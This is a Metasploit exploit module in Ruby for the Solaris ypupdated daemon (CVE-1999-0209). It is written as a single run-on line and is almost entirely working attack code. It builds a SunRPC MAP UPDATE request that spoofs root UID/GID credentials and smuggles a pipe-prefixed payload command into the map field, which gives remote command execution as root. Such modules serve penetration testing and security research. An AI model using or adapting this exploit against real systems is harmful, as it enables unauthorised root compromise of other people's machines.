require 'msf/core' module Msf class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote include Exploit::Remote::SunRPC def initialize(info = {}) super(update_info(info, 'Name' => 'Solaris ypupdated Command Execution', 'Description' => %q{ This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option. }, 'Author' => [ 'I)ruid ' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 4498 $', 'References' => [ ['BID', '1749'], ['CVE', '1999-0209'], ['OSVDB', '11517'], ], 'Privileged' => true, 'Platform' => ['unix', 'solaris'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, }, 'Targets' => [ ['Automatic', { }], ], 'DefaultTarget' => 0 )) register_options( [ OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']), OptInt.new('GID', [false, 'GID to emulate', 0]), OptInt.new('UID', [false, 'UID to emulate', 0]) ], self.class ) end def exploit hostname = datastore['HOSTNAME'] program = 100028 progver = 1 procedure = 1 print_status 'Sending PortMap request for ypupdated program' pport = sunrpc_create('udp', program, progver) print_status "Sending MAP UPDATE request with command '#{payload.encoded}'" print_status 'Waiting for response...' sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], []) command = '|' + payload.encoded msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000) sunrpc_call(procedure, msg) sunrpc_destroy print_good 'No Errors, appears to have succeeded!' rescue ::Rex::Proto::SunRPC::RPCTimeout print_status 'Warning: ' + $! print_status 'Exploit may or may not have succeeded.' end end end